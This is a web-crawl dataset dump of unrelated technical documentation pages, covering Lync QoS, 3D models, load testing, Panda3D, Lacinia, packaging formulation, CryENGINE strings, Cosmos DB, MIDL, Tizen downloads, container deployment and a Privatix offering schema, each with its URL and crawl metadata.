Dataset columns: content (string, length 0 to 557k), url (string, length 16 to 1.78k), timestamp (timestamp[ms]), dump (string, length 9 to 15), segment (string, length 13 to 17), image_urls (string, length 2 to 55.5k), netloc (string, length 7 to 77).
After you create a client QoS policy, stop and restart Lync 2010 or Lync 2010 Attendant for the changes to take effect. See Also: Creating a Quality of Service (QoS) Policy on Lync Server
https://docs.microsoft.com/en-us/previous-versions/office/skype-server-2010/gg405414(v=ocs.14)?redirectedfrom=MSDN
2020-05-25T09:31:54
CC-MAIN-2020-24
1590347388012.14
[]
docs.microsoft.com
The head and body for Tanany were sculpted in Zbrush + 3dsmax, and the toon skins were created from photos, then retouched for the final anime textures. Tanany also comes with custom-sculpted longer nails as well as custom lashes for the anime eyes. The figure's shape required custom JCMs for the hips, elbows, and shoulders, and the big beautiful eyes have morph fixes for blinking and winking. Keyed morphs are included for the arms and knees. Mix Tanany with Genesis 8 females to get that special anime look.
http://docs.daz3d.com/doku.php/public/read_me/index/58645/start
2020-05-25T09:02:13
CC-MAIN-2020-24
1590347388012.14
[]
docs.daz3d.com
Coded file, or using thread synchronization locks. Doing so may prevent the load test engine from running as efficiently as it should, and thus reduce the load that can be generated. The load test / Web test runtime engine is designed with the assumption that coded Web tests (and Web test plug-ins) do not block. The reason for this is that the load test runtime engine takes advantage of the async I/O capabilities of System.Net.HttpWebRequest (which is used to send the HTTP requests) so that it does not require a separate thread for each virtual user running a test. This allows larger numbers of users to be simulated using less memory. The way this works is that the load test engine has a small pool of threads (one per processor) that is used to start new Web test iterations. This includes calling the PreWebTest event handler and making the first call to the request enumerator for a coded Web test. This thread then issues the first Web test request asynchronously. As soon as that request has been issued, the thread is free to go start another Web test iteration for a different virtual user. This usually works great, but if the coded Web test blocks in the PreWebTest event handler (or request enumerator), then this thread blocks and cannot go on to start another Web test. If the thread blocks long enough, the result could be that the actual number of Web tests running in parallel may not reach the number of virtual users specified in the load test. To complete the explanation: the thread pool mentioned above is only used to start the Web test and run the first request. When a Web test request completes asynchronously, the completion of the request is processed on one of the threads in the .NET I/O completion thread pool. The dependent requests are then submitted (again asynchronously) on one of these threads. When think time is enabled, there is yet another thread that submits async requests after the appropriate think time has passed. A good way to tell if your Web test code is using too much time is to monitor the performance counter "% Time in WebTest Code". You can find this performance counter in the load test results viewer's "Counters" tree under "Overall" / "Test" and add it to one of the graphs.
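As an illustration of why blocking hurts an engine built on asynchronous I/O, here is a minimal Python asyncio sketch (not the Visual Studio load test API, only an analogy): many virtual users share one event loop thread, and a blocking sleep in the per-user callback serializes them, while an awaited sleep lets them overlap.

import asyncio, time

async def virtual_user(blocking):
    # Analogue of a PreWebTest handler: time.sleep() ties up the shared
    # event-loop thread, while awaiting asyncio.sleep() yields it.
    if blocking:
        time.sleep(0.5)
    else:
        await asyncio.sleep(0.5)

async def run(users, blocking):
    start = time.perf_counter()
    await asyncio.gather(*(virtual_user(blocking) for _ in range(users)))
    return time.perf_counter() - start

async def main():
    print("non-blocking, 20 users:", round(await run(20, False), 2), "s")  # ~0.5 s
    print("blocking,     20 users:", round(await run(20, True), 2), "s")   # ~10 s

asyncio.run(main())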
https://docs.microsoft.com/en-us/archive/blogs/billbar/coded-web-tests-and-web-test-plug-ins-should-not-block-the-thread
2020-02-17T02:18:09
CC-MAIN-2020-10
1581875141460.64
[]
docs.microsoft.com
panda3d.core.NotifyCategory (class NotifyCategory). setSeverity(severity: NotifySeverity) → None: sets the severity level of messages that will be reported from this Category; this allows any message of this severity level or higher. isOn(severity: NotifySeverity) → bool: returns true if messages of the indicated severity level ought to be reported for this Category. isSpam() → bool. out(severity: NotifySeverity) → ostream: begins a new message to this Category at the indicated severity level; if the indicated severity level is enabled, this writes a prefixing string to the Notify.out() stream and returns that; if the severity level is disabled, this returns Notify.null(). getNumChildren() → size_t: returns the number of child Categories of this particular Category. getChild(i: size_t) → NotifyCategory: returns the nth child Category of this particular Category. static setServerDelta(delta: int) → None: sets a global delta (in seconds) between the local time and the server's time, for the purpose of synchronizing the time stamps in the log messages of the client with that of a known server. property severity (getter/setter, return type NotifySeverity): sets the severity level of messages that will be reported from this Category; this allows any message of this severity level or higher.
https://docs.panda3d.org/1.10/cpp/reference/panda3d.core.NotifyCategory
2020-02-17T01:22:25
CC-MAIN-2020-10
1581875141460.64
[]
docs.panda3d.org
Attaching Resolvers¶ Schemas start as EDN files, which has the advantage that symbols do not have to be quoted (useful when using the list and non-null qualifiers on types). However, EDN is data, not code, which makes it nonsensical to defined field resolvers directly in the schema. One option is to use assoc-in to attach resolvers after reading the EDN, but before invoking com.walmartlabs.lacinia.schema/compile. This can become quite cumbersome in practice. Instead, the standard approach is to put keyword placeholders in the EDN file, and then use com.walmartlabs.lacinia.util/attach-resolvers, which walks the schema tree and makes the changes, replacing the keywords with the actual functions. (ns org.example.schema (:require [clojure.edn :as edn] [clojure.java.io :as io] [com.walmartlabs.lacinia.schema :as schema] [com.walmartlabs.lacinia.util :as util] [org.example.db :as db])) (defn star-wars-schema [] (-> (io/resource "star-wars-schema.edn") slurp edn/read-string (util/attach-resolvers {:hero db/resolve-hero :human db/resolve-human :droid db/resolve-droid :friends db/resolve-friends}) schema/compile)) The attach-resolvers step occurs before the schema is compiled. Resolver Factories¶ There are often cases where many fields will need very similar field resolvers. A second resolver option exist for this case, where the schema references a field resolver factory rather than a field resolver itself. In the schema, the value for the :resolve key is a vector of a keyword and then additional arguments: {:queries {:hello {:type String :resolve [:literal "Hello World"]}}} In the code, you must provide the field resolver factory: (ns org.example.schema (:require [clojure.edn :as edn] [clojure.java.io :as io] [com.walmartlabs.lacinia.schema :as schema] [com.walmartlabs.lacinia.util :as util])) (defn ^:private literal-factory [literal-value] (fn [context args value] literal-value)) (defn hello-schema [] (-> (io/resource "hello.edn") slurp edn/read-string (util/attach-resolvers {:literal literal-factory}) schema/compile)) The attach-resolvers function will see the [:literal "Hello World"] in the schema, and will invoke literal-factory, passing it the "Hello World" argument. literal-factory is responsible for returning the actual field resolver. A field resolver factory may have any number of arguments. Common uses for field resolver factories: - Mapping GraphQL field names to Clojure hyphenated names - Converting or formatting a raw value into a selected value - Accessing a deeply nested value in a structure
https://lacinia.readthedocs.io/en/latest/resolve/attach.html
2020-02-17T00:16:20
CC-MAIN-2020-10
1581875141460.64
[]
lacinia.readthedocs.io
Packaging Packaging levels Product packaging is organized in 3 levels, defined by Wikipedia as: Primary packaging This type of packaging is generally identified as the consumer sales unit (CSU), which means the smallest quantity offered to the consumer. It can be the consumer sales unit directly, but in most cases it refers to a grouping of consumer units into a commercial lot (example: a cardboard pack made of 12 natural yogurts). This packaging wraps the minimal quantity of product that a client can buy: it will be removed by the final consumer. According to the 94/62/CE directive « Packaging and packaging wastes »: « The primary packaging is the packaging conceived to form, at the sales outlet, a sales unit for the final user or the consumer ». Secondary packaging The secondary packaging gathers intermediary groupings of CSUs which should be easy to handle and move to the store shelves by distributors or sales outlet operators (e.g. American box). This packaging is designed to facilitate the shelf layout and the recycling done by the distributor. The most common secondary packaging: - carton packs with easy opening or opening with flaps; - boxes or flow-packs allowing products to be grouped during promotions. According to the 94/62/CE directive « Packaging and packaging wastes »: « The secondary packaging is the packaging designed to constitute, at the sales outlet, a group of a certain number of CSUs, whether it is sold unaltered to the final user or the consumer, or whether it only helps to fill the sales outlet displays; it must be removable from the product without having its characteristics altered ». Tertiary packaging It corresponds to logistics handling packaging: it allows the transportation of a large quantity of products to stores or to the manufacturer. It can be complete pallets of a single reference, or « variegated » pallets (comprising a determined range), and their accessories (films, identification labeling, shrouds, angle irons, etc.). The most common tertiary packaging: - transportation boxes (American box); - pallets; - shrink films; - logistics labels, etc. Packaging formulation The packaging formulation allows the calculation of: - the costs linked to the packagings; - tares, net weights and gross weights by packaging level; - dimensions by packaging level. Simple packagings To add simple packagings to a product, there are two possibilities: - Go to the product « Packaging » section and click on the arrow situated at the right of « Create a new product », then choose « Packaging ». Fill out the name of the packaging (mandatory field) as well as its description and its unit, and click on « Save ». - Go to the product « Packaging » section and click on « Add », which allows you to select a pre-recorded packaging (created according to the step previously described). In both cases: - Click on the « Quantity » field to fill in the packaging quantities planned for each level; - Click on the « Unit » field to choose the unit corresponding to the quantity previously chosen. This unit can be of type « Each », « Product per packaging » (allowing you to say that you want to put 15 CSUs per package), « Meters » or « Square meters »; - Click on the « Packaging level » field to choose the packaging level: primary, secondary, tertiary; - Click on the « Master » field to say which packaging of the level has the biggest dimensions. It is then possible to know the dimensions of the CSU at the primary, secondary or tertiary level.
This avoids filling in the dimensions of each packaging, because we only consider the dimensions of the master packaging of each level. In the case in which the CSU's dimensions are bigger than the packaging's (example: chicken), it is necessary to add the aspect « Dimensions on the finished product » and fill in the « Length/Width/Height » fields. Then it is possible to navigate to each entity (packaging) by simply clicking on it; this gives access to the properties and the different lists of the packaging. By clicking on « Properties » and « Edit the properties », you can find, at the bottom of the page, the « Tare » field, which is used to enter the packaging weight. By clicking on the « Costs » list, it is possible to enter the packaging costs in the « Value » column and their unit in the « Unit » column. The « N-1 » and « N+1 » fields represent the costs of the previous and next year respectively. The « Plants » field is used to enter the costs linked to the plant on the product model (example: storage cost of plant 1). By clicking on the « Purchase price » list, you can enter the costs linked to purchase volumes, the year and the supplier (example: purchasing 100 cardboard boxes will not cost the same price as purchasing 10,000). In other words, this list is used to store the price proposals made by the suppliers. Click on « Formulate » to compute, for instance, the costs linked to the packaging, which will be found in the « Costs » section of the product. Packaging kits Packaging kits gather a number of primary and/or secondary and/or tertiary packagings. They are very useful in two cases: - when packagings are common (qualitatively and quantitatively) to many products (example: 3 packaging kits for 1000 products); - when the palletisation has to be described (example: pallet height, number of layers, number of cardboard boxes per layer). To add packaging kits to a product, there are two possibilities: - Go to the product's « Packaging » section, click on the arrow at the right of « Create a product » and choose « Packaging kit ». Complete the kit's name (mandatory field), its description and its unit, and click on « Save ». - Go to the product's « Packaging » section and click on « Add », which allows the selection of a pre-recorded packaging kit. In both cases, the packagings contained in the kit are added and completed in the same way as described in the « Simple packagings » section. « Palletisation » aspect addition The Palletisation aspect allows you to specify the number of packages per pallet, the number of layers per pallet and the number of packages per layer. It can be added on the packaging kit by going to Product > Packaging > Kit > Properties, clicking on « Add an aspect » and then selecting « Palletisation ». New properties are then available on the palletisation kit. To complete them, click on « Edit the properties ». You then have access to the kit designation data (name, description, etc.). Concerning the palletisation data, you will have to complete: - the number of layers per pallet: here 2; - the number of packagings per layer (in a pallet): here 6; - the number of packagings in the pallet's last layer: here 4; - the total number of packagings per pallet: here 6*2 + 4 = 16 (see the short calculation sketch at the end of this page). Then go to the « Packaging » list to complete the kit with its packagings (cf. Simple packagings). Then go back to the product « Packaging » list and click on « Formulate » to calculate the costs due to the packagings.
Finally, go to the « Reports » list and click on « Create reports » to obtain the production technical sheet on which the packaging description will appear. To indicate the packaging dimensions, click on each master packaging and go to its properties. Click on « Add an aspect » and choose « Size ». It is then possible to add the dimensions (in mm) of the packaging. After generating the reports, we obtain the finished technical sheet with the packaging description.
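As a small illustration of the palletisation and formulation arithmetic above, here is a hypothetical Python sketch; the function names and the gross-weight formula are assumptions for illustration, and only the 6*2 + 4 = 16 example comes from the text.

def total_packagings_per_pallet(layers, per_layer, last_layer):
    # Full layers plus the (possibly partial) last layer: 2 * 6 + 4 = 16.
    return layers * per_layer + last_layer

def gross_weight(net_weight, tares):
    # Simplified assumption: gross weight of a level = net weight plus the
    # tare of every packaging wrapped around the product at that level.
    return net_weight + sum(tares)

print(total_packagings_per_pallet(layers=2, per_layer=6, last_layer=4))  # 16
print(gross_weight(net_weight=1.0, tares=[0.05, 0.3]))                   # 1.35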
http://docs.becpg.fr/en/utilization/packaging-formulation.html
2020-02-17T00:22:14
CC-MAIN-2020-10
1581875141460.64
[]
docs.becpg.fr
Overview CryENGINE has a custom reference-counted string class CryString (declared in CryString.h) which is a replacement for the STL std::string. It should always be preferred over std::string. For convenience, string is used as a typedef for CryString. How to Use Strings as Key Values for STL Containers The following code shows good (efficient) and bad usage: const char *szKey = "Test"; map< string, int >::const_iterator iter = m_values.find( CONST_TEMP_STRING( szKey ) ); // Good way map< string, int >::const_iterator iter = m_values.find( szKey ); // Bad way, don't do it like this! By using the suggested method, you avoid allocation/deallocation and copying for a temporary string object. This is a common problem for most string classes. By simply using the macro CONST_TEMP_STRING, we trick the string class into using the pointer directly without freeing the data afterwards. Further Usage Tips - Do not use std::string or std::wstring, just string and wstring, and never include the standard string header <string>. - Use the c_str() method to access the contents of the string. - Never modify memory returned by the c_str() method, since strings are reference-counted and a wrong string instance could be affected. - Do not pass strings via abstract interfaces; all interfaces should use const char* in interface methods. - CryString has a combined interface of std::string and MFC CString, so both interface types can be used for string operations. - Avoid doing many string operations at run-time as they often cause memory reallocations. - For fixed-size strings (e.g. 256 chars) use CryFixedStringT (it should be preferred over static char arrays).
https://docs.cryengine.com/display/SDKDOC4/CryString
2020-02-17T01:22:19
CC-MAIN-2020-10
1581875141460.64
[]
docs.cryengine.com
Here you'll find the configurable properties of our reusable CELUM Connectors. In contrast to the extensions that run inside CELUM, connectors run in some 3rd-party system and connect to CELUM from the outside via an API. So the two systems must be able to communicate between one another in order for this to work.
https://docs.brix.ch/de/celum_connectors
2020-02-17T01:49:26
CC-MAIN-2020-10
1581875141460.64
[]
docs.brix.ch
Use Robo 3T with Azure Cosmos DB's API for MongoDB To connect to your Cosmos account using Robo 3T, you must: - Download and install Robo 3T - Have your Cosmos DB connection string information Connect using Robo 3T To add your Cosmos account to the Robo 3T connection manager, perform the following steps: Retrieve the connection information for your Cosmos account configured with Azure Cosmos DB's API for MongoDB using the instructions here. Run Robomongo.exe Click the connection button under File to manage your connections. Then, click Create in the MongoDB Connections window, which will open up the Connection Settings window. In the Connection Settings window, choose a name. Then, find the Host and Port from your connection information in Step 1 and enter them into Address and Port, respectively. On the Authentication tab, click Perform authentication. Then, enter your Database (default is Admin), User Name and Password. Both User Name and Password can be found in your connection information in Step 1. On the SSL tab, check Use SSL protocol, then change the Authentication Method to Self-signed Certificate. Finally, click Test to verify that you are able to connect, then Save. Next steps - Learn how to use Studio 3T with Azure Cosmos DB's API for MongoDB. - Explore MongoDB samples with Azure Cosmos DB's API for MongoDB.
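The same connection values entered in Robo 3T can also be used from code. Here is a minimal sketch with the third-party pymongo driver (not part of this article); the host, user name (account name) and password (account key) are placeholders to be copied from the connection string in Step 1.

from pymongo import MongoClient

# Placeholders: copy these values from the Azure Cosmos DB connection string.
HOST = "<account-name>.documents.azure.com"
PORT = 10255                     # port from the connection string (commonly 10255)
USER = "<account-name>"
PASSWORD = "<account-key>"

# ssl=true mirrors the "Use SSL protocol" setting used in Robo 3T.
client = MongoClient(f"mongodb://{USER}:{PASSWORD}@{HOST}:{PORT}/?ssl=true")
print(client.list_database_names())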
https://docs.microsoft.com/en-us/azure/cosmos-db/mongodb-robomongo
2020-02-17T02:15:51
CC-MAIN-2020-10
1581875141460.64
[]
docs.microsoft.com
COM, DCOM, and Type Libraries Component Object Model (COM) and Distributed Component Object Model (DCOM) use Remote Procedure Calls (RPC) to enable distributed component objects to communicate with each other. Thus, a COM or DCOM interface defines the identity and external characteristics of a COM object. It forms the means by which clients can gain access to an object's methods and data. With DCOM, this access is possible regardless of whether the objects exist in the same process, different processes on the same machine, or on different machines. As with RPC client/server interfaces, a COM or DCOM object can expose its functionality in a number of different ways and through multiple interfaces.. This can occur even if the object and client applications were written in different programming languages. The COM/DCOM run-time environment can also use a type library to provide automatic cross-apartment, cross-process, and cross-machine marshaling for interfaces described in type libraries. Characteristics of an Interface You define the characteristics of an interface in an interface definition (IDL) file and an optional application configuration file (ACF): - The IDL file specifies the characteristics of the application's interfaces on the wire — that is, how data is to be transmitted between client and server, or between COM objects. - The ACF file specifies interface characteristics, such as binding handles, that pertain only to the local operating environment. The ACF file can also specify how to marshal and transmit a complex data structure in a machine-independent form. For more information on IDL and ACF files, see The IDL and ACF Files. The IDL and ACF files are scripts written in Microsoft Interface Definition Language (MIDL), which is the Microsoft implementation and extension of the OSF-DCE interface definition language (IDL). The Microsoft extensions to the IDL language enable you to create COM interfaces and type libraries. The compiler, Midl.exe, uses these scripts to generate C-language stubs and header files as well as type library files. The MIDL Compiler Depending on the contents of your IDL file, the MIDL compiler will generate any of the following files. A C-language proxy/stub file, an interface identifier file, a DLL data file, and a related header file for a custom COM interface. The MIDL compiler generates these files when it encounters the object attribute in an interface attribute list. For more detailed information on these files, see Files Generated for a COM Interface. A compiled type library (.tlb) file and related header file. MIDL generates these files when it encounters a library statement in the IDL file. For general information about type libraries, see Contents of a Type Library, in the Automation Programmer's Reference. C/C++-language client and server stub files and related header file for an RPC interface. These files are generated when there are interfaces in the IDL file that do not have the object attribute. For an overview of the stub and header files, see General Build Procedure. For more detailed information, see Files Generated for an RPC Interface.
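As a sketch of what type-library-driven access looks like from another language, the snippet below uses the third-party comtypes package on Windows to create a stock COM object by its ProgID; it is only an illustration of cross-language access through registered type information, not part of the MIDL toolchain described above.

# Requires Windows and the third-party comtypes package (pip install comtypes).
import comtypes.client

# CreateObject looks up the ProgID in the registry and uses the object's
# registered type information to expose its methods to Python.
fso = comtypes.client.CreateObject("Scripting.FileSystemObject")
print(fso.FolderExists("C:\\Windows"))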
https://docs.microsoft.com/en-us/windows/win32/midl/com-dcom-and-type-libraries
2020-02-17T01:53:21
CC-MAIN-2020-10
1581875141460.64
[]
docs.microsoft.com
Figure: User scenario. When you stop the download, use the download_cancel() function. It changes the download state to DOWNLOAD_STATE_CANCELED. From this state, you can restart the download with the download_start() function. When the download is no longer needed, release its resources with the download_destroy() function. To use the functions and data types of the Download API, include the <download.h> header file in your application. The downloading library needs no initialization prior to the API usage.
https://docs.tizen.org/application/native/guides/connectivity/download
2020-02-17T01:48:30
CC-MAIN-2020-10
1581875141460.64
[]
docs.tizen.org
Rigging the Characters There are a few boid requirements: - Must be a skinned character. - LOD's (especially LOD1 for the ragdoll). CRYENGINE 3.5 - LOD's in CHR's The skin with LOD's needs to be re-exported from DCC tools as a .skin. LOD's in CHR's are not supported any more. Animations also need to be re-exported/imported through the Animation Compression Editor and Animation Importer tool as well. Simple boids like insects or fish can have one single bone and point to null animations. Animation There are three animations boid characters use or require: - "swim_loop" - "fly_loop" - "landing" Don't forget that each boid character needs a CAL file that points to its animations. As you see below, these three animations will be slightly scaled according to the speed of the boid. Entity Properties
https://docs.cryengine.com/pages/?pageId=23308008&sortBy=createddate
2020-02-17T00:16:20
CC-MAIN-2020-10
1581875141460.64
[]
docs.cryengine.com
Microsoft Partner Summits coming to a city near you in October Join us during October for 2 days of training on Microsoft's latest products. This series is designed specifically for sales and marketing professionals and will provide you with the sales, marketing and licensing knowledge to grow your business with Office, Office 365, Windows, Windows Server and devices. As well as the agenda sessions, there will be ample time to network with Microsoft subject matter experts to ask any questions you have, as well as to network with like-minded Microsoft Partners. You will also have the opportunity to get "hands on" with the latest devices. Mark these dates in your calendar and register today to secure your spot. We look forward to seeing you there!
https://docs.microsoft.com/en-us/archive/blogs/auspartners/microsoft-partner-summits-coming-to-a-city-near-you-in-october
2020-02-17T02:14:18
CC-MAIN-2020-10
1581875141460.64
[]
docs.microsoft.com
Deployment of Pre-Trained Models on Azure Container Services This post is authored by Mathew Salvaris, Ilia Karmanov and Jaya Mathew. Data scientists and engineers routinely encounter issues when moving their final functional software and code from their development environment (laptop, desktop) to a test environment, or from a staging environment to production. These difficulties primarily stem from differences between the underlying software environments and infrastructure, and they eventually end up costing businesses a lot of time and money, as data scientists and engineers work towards narrowing down these incompatibilities and either modify software or update environments to meet their needs. Containers end up being a great solution in such scenarios, as the entire runtime environment (application, libraries, binaries and other configuration files) get bundled into a package to ensure smooth portability of software across different environments. Using containers can, therefore, improve the speed at which apps can be developed, tested, deployed and shared among users working in different environments. Docker is a leading software container platform for enabling developers, operators and enterprises to overcome their application portability issue. The goal of Azure Container Services (ACS) is to provide a container hosting environment by using popular open-source tools and technologies. Like all software, deploying machine learning (ML) models can be tricky due to the plethora of libraries used and their dependencies. In this tutorial, we will demonstrate how to deploy a pre-trained deep learning model using ACS. ACS enables the user to configure, construct and manage a cluster of virtual machines preconfigured to run containerized applications. Once the cluster is setup, DC/OS is used for scheduling and orchestration. This is an ideal setup for any ML application since Docker containers facilitate ultimate flexibility in the libraries used, are scalable on demand, and all while ensuring that the application is performant. The Docker image used in this tutorial contains a simple Flask web application with Nginx web server and uses Microsoft's Cognitive Toolkit (CNTK) as the deep learning framework, with a pretrained ResNet 152 model. Our web application is a simple image classification service, where the user submits an image, and the application returns the class the image belongs to. This end-to-end tutorial is split into four sections, namely: - Create Docker image of our application (00_BuildImage.ipynb). - Test the application locally (01_TestLocally.ipynb). - Create an ACS cluster and deploy our web app (02_TestWebApp.ipynb). - Test our web app (03_TestWebApp.ipynb, 04_SpeedTestWebApp.ipynb). Each section has an accompanying Jupyter notebook with step-by-step instructions on how to create, deploy and test the web application. Create Docker Image of the Application (00_BuildImage.ipynb) The Docker image in this tutorial contains three main elements, namely: the web application (web app), pretrained model, and the driver for executing our model, based on the requests made to the web application. The Docker image is based on an Ubuntu 16.04 image to which we added the necessary Python dependencies and installed CNTK (another option would be to test our application in an Ubuntu Data Science Virtual Machine from Azure portal). 
An important point to be aware of is that the Flask web app is run on port 5000, so we have created a proxy from port 88 to port 5000 using Nginx to expose port 88 in the container. Once the container is built, it is pushed to a public Docker hub account so that the ACS cluster can access it. Test the Application Locally (01_TestLocally.ipynb) Having short feedback loops while debugging is very important and ensures quick iterations. Docker images allow the user to do this as the user can run their application locally and check the functionality, before going through the entire process of deploying the app to ACS. This notebook outlines the process of spinning up the Docker container locally and configuring it properly. Once the container is up and running, the user can send requests to be scored using the model and check the model performance. Create an ACS Cluster and Deploy the Web App (02_DeployOnACS.ipynb) In this notebook, the Azure CLI is used to create an ACS cluster with two nodes (this can also be done via the Azure portal). Each node is a D2 VM, which is quite small but sufficient for this tutorial. Once ACS is set up, to deploy the app, the user needs to create an SSH tunnel into the head node. This ensures that the user can send the JSON application schema to Marathon. In the schema, we have mapped port 80 of the host to port 88 on the container (users can choose different ports as well). This tutorial only deploys one instance of the application (the user can scale this up, but it will not be discussed here). Marathon has a web dashboard that can be accessed through the SSH tunnel by simply pointing the web browser to the tunnel created for deploying the application schema. Test the Web App (03_TestWebApp.ipynb, 04_SpeedTestWebApp.ipynb) Once the application has been successfully deployed, the user can send scoring requests. The illustration below shows examples of some of the results returned from the application. The ResNet 152 model seems to be fairly accurate, even when parts of the subject (in the image) are occluded. Further, the average response time for these requests is less than a second, which is very performant. Note that this tutorial was run on a virtual machine in the same region as the ACS. Response times across regions may be slower but the performance is still acceptable for a single container on a single VM. After running the tutorial, to delete ACS and free up other associated Azure resources, run the cells at the end of the 02_TestWebApp.ipynb notebook. We hope you found this interesting - do share your thoughts or comments with us below. Mathew, Ilia & Jaya
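As a small addendum to the "Test the Web App" step, a scoring request could be sent from Python roughly as below; the host name, route and JSON field names are assumptions for illustration, since the exact request schema of the tutorial's Flask app is defined in its notebooks rather than in this post.

import base64
import requests

# Hypothetical endpoint: port 80 on the ACS agents maps to port 88 in the container.
SCORING_URL = "http://<acs-agents-public-dns>:80/score"

with open("example.jpg", "rb") as f:
    payload = {"image": base64.b64encode(f.read()).decode("ascii")}

resp = requests.post(SCORING_URL, json=payload, timeout=30)
resp.raise_for_status()
print(resp.json())  # e.g. the predicted class label and its probability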
https://docs.microsoft.com/en-us/archive/blogs/machinelearning/deployment-of-pre-trained-models-on-azure-container-services
2020-02-17T02:36:53
CC-MAIN-2020-10
1581875141460.64
[array(['https://msdnshared.blob.core.windows.net/media/2017/05/052517_1718_Deploymento1.png', None], dtype=object) ]
docs.microsoft.com
Offering template maybe seen as standard contract for particular service, where some parameters are variable per Agent. Offering template shipped with service module. Each service module has unique offering template. Both Agent and Client have identical offering template, when choose to use same service module. Offering template - is JSON schema that includes: Offering schema - offering fields to be filled by Agent Core fields - fields that common for any service. They are required for proper Privatix core operation. They are generic and doesn't contain any service specifics. Service custom fields - (aka additional parameters) any fields that needed for particular service operation. They do not processed by Privatix core, but passed to Privatix adapter for any custom logic. UI schema - schema that can be used by GUI to display fields for best user experience Each Offering template has unique hash. Any offering always includes in its body hash of corresponding offering template. That's how offering is linked to template and related service module. When Client receives offering, he checks that: Offering template with noted hash exists in Client's database Offering message passes validation according to offering template Such validation ensures, that Agent and Client both has: exactly same offering template offering is properly filled according to offering template schema Schema example {"schema": {"title": "Privatix VPN offering","type": "object","properties": {"serviceName": {"title": "name of service","type": "string","description": "Friendly name of service","const": "Privatix VPN"},"templateHash": {"title": "offering template hash","type": "string","description": "Hash of this offering template"},"nonce": {"title": "nonce","type": "string","description": "uuid v4. Allows same offering to be published twice, resulting in unique offering hash."},"agentPublicKey": {"title": "agent public key","type": "string","description": "Agent's public key"},"supply": {"title": "service supply","type": "number","description": "Maximum Number of concurrent orders that can coexist"},"unitName": {"title": "unit name","type": "string","description": "name of single unit of service","examples": ["MB","kW","Lesson"]},"unitPrice": {"title": "unit price","type": "number","description": "Price in PRIX for single unit of service."},"minUnits": {"title": "min units","type": "number","description": "Minimum number of units Agent expect to sell. Deposit must suffice to buy this amount."},"maxUnits": {"title": "max units","type": "number","description": "Maximum number of units Agent will sell."},"billingType": {"title": "billing type","type": "string","enum": ["prepaid","postpaid"],"description": "Model of billing: postapaid or prepaid"},"billingFrequency": {"title": "billing frequency","type": "number","description": "Specified in units of servce. Represent, how often Client MUST send payment cheque to Agent."},"maxBillingUnitLag": {"title": "max billing unit lag","type": "number","description": "Maximum tolerance of Agent to payment lag. 
If reached, service access is suspended."},"maxSuspendTime": {"title": "max suspend time","type": "number","description": "Maximum time (seconds) Agent will wait for Client to continue using the service, before Agent will terminate service."},"maxInactiveTime": {"title": "max inactive time","type": "number","description": "Maximum time (seconds) Agent will wait for Client to start using the service for the first time, before Agent will terminate service."},"setupPrice": {"title": "setup fee","type": "number","description": "Setup fee is price, that must be paid before starting using a service."},"freeUnits": {"title": "free units","type": "number","description": "Number of first free units. May be used for trial period."},"country": {"title": "country of service","type": "string","description": "Origin of service"},"additionalParams": {"title": "Privatix VPN service parameters","type": "object","description": "Additional service parameters","properties": {"minUploadSpeed": {"title": "min. upload speed","type": "string","description": "Minimum upload speed in Mbps"},"maxUploadSpeed": {"title": "max. upload speed","type": "string","description": "Maximum upload speed in Mbps"},"minDownloadSpeed": {"title": "min. download speed","type": "string","description": "Minimum download speed in Mbps"},"maxDownloadSpeed": {"title": "max. upload speed","type": "string","description": "Maximum download speed in Mbps"}},"required": []}},"required": ["serviceName","supply","unitName","billingType","setupPrice","unitPrice","minUnits","maxUnits","billingInterval","maxBillingUnitLag","freeUnits","templateHash","product","agentPublicKey","additionalParams","maxSuspendTime","country"]},"uiSchema": {"agentPublicKey": {"ui:widget": "hidden"},"billingInterval": {"ui:help": "Specified in unit_of_service. Represent, how often Client MUST provide payment approval to Agent."},"billingType": {"ui:help": "prepaid/postpaid"},"country": {"ui:help": "Country of service endpoint in ISO 3166-1 alpha-2 format."},"freeUnits": {"ui:help": "Used to give free trial, by specifying how many intervals can be consumed without payment"},"maxBillingUnitLag": {"ui:help": "Maximum payment lag in units after, which Agent will suspend serviceusage."},"maxSuspendTime": {"ui:help": "Maximum time without service usage. Agent will consider, that Client will not use service and stop providing it. Period is specified in minutes."},"maxInactiveTime": {"ui:help": "Maximum time Agent will wait for Client to start using the service for the first time, before Agent will terminate service. Period is specified in minutes."},"minUnits": {"ui:help": "Agent expects to sell at least this amount of service."},"maxUnits": {"ui:help": "Agent will sell at most this amount of service."},"product": {"ui:widget": "hidden"},"setupPrice": {"ui:help": "setup fee"},"supply": {"ui:help": "Maximum supply of services according to service offerings. It represents maximum number of clients that can consume this service offering concurrently."},"template": {"ui:widget": "hidden"},"unitName": {"ui:help": "MB/Minutes"},"unitPrice": {"ui:help": "Price in PRIX for one unit of service."},"additionalParams": {"ui:widget": "hidden"}}}
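To make the client-side checks described above concrete, here is a minimal Python sketch using the third-party jsonschema package; the file names and the SHA-256 hashing of the template are illustrative assumptions, since the exact canonicalisation and hash algorithm used by Privatix are not specified here.

import hashlib
import json
from jsonschema import validate  # pip install jsonschema

with open("offering_template.json") as f:   # hypothetical file name
    template = json.load(f)

# Example hash of the template body (algorithm and canonicalisation assumed).
template_hash = hashlib.sha256(
    json.dumps(template, sort_keys=True, separators=(",", ":")).encode()
).hexdigest()

with open("offering.json") as f:            # hypothetical file name
    offering = json.load(f)

# Client-side checks: the offering must reference a known template hash and
# must validate against the template's offering schema.
assert offering["templateHash"] == template_hash
validate(instance=offering, schema=template["schema"])
print("offering is valid for template", template_hash[:16], "...")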
https://docs.privatix.network/privatix-core/core/messaging/offering/offering-template
2020-02-17T01:09:00
CC-MAIN-2020-10
1581875141460.64
[]
docs.privatix.network
About Me I’ve been working with British and International doctors since 2011, receiving referrals from Professional Support Units throughout the UK. My professional background has been within Communication Training as a consultant and manager in the UK, Europe, Asia and the Middle East. Don’t hesitate to contact me with any questions or general enquiry you might have. I’m more than happy to meet for an initial chat.
https://comms4docs.com/about/
2020-02-17T01:28:40
CC-MAIN-2020-10
1581875141460.64
[]
comms4docs.com
